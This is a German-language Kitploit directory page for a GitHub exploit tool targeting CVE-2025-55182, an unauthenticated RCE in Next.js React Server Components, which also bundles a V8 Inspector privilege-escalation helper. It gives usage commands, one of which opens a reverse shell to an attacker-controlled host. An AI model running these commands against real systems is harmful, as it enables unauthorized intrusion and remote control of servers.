Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — # Eigenständiger Exploit für CVE-2025-55182 Erzielt eine nicht authentifizierte RCE in Next.js App Router über die Flight-Deserialisierung von React Server Components, mit Reverse Shell und Node.js V8 Inspector Privilege-Escalation-Helfer. | Kitploit
Tools/GitHubGitHub/r3vpwnx/cve-2025-55182
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

# Eigenständiger Exploit für CVE-2025-55182 Erzielt eine nicht authentifizierte RCE in Next.js App Router über die Flight-Deserialisierung von React Server Components, mit Reverse Shell und Node.js V8 Inspector Privilege-Escalation-Helfer.

Repository anzeigen
vor 22h 49mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 - React2Shell (CVE-2025-55182) nicht authentifizierte RCE über React Server Components Flight-Deserialisierung

Eigenständiger Exploit für CVE-2025-55182 in Next.js-App-Router-Anwendungen, die React Server Components aktivieren. Präparierte RSC-Flight-Payloads an den Server-Action-Endpunkt ermöglichen nicht authentifizierte Remote-Codeausführung. Enthält einen Node.js-V8-Inspector-Helfer (Debug-Port) zur lokalen Privilegienerweiterung, der Code in einem privilegierten Prozess über eine process.mainModule.require-Sandbox-Umgehung ausführt.

CVE: CVE-2025-55182

Anforderungen

root@kitploit:~
python3 -m pip install requests    # für die Python-PoC(s)

Verwendung

cdp_privesc.py

root@kitploit:~
python3 cdp_privesc.py <target>

(RSC RCE — eingebunden, siehe Credits)

react2shell-poc.py
root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # fehlerbasierte Befehls-Exfiltration
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

Referenzen

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

Credits

react2shell-poc.py ist p3ta00s öffentlicher CVE-2025-55182-PoC, unverändert von https://github.com/p3ta00/react2shell-poc für eine eigenständige Kette eingebunden. cdp_privesc.py (die Node.js-V8-Inspector-Lokale-Privilegienerweiterung) ist original.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und Bildungszwecke. Führe dies nur gegen Systeme aus, die dir gehören oder für die du ausdrückliche schriftliche Genehmigung zum Testen hast.


Autor: r3vpwnx

Tool herunterladen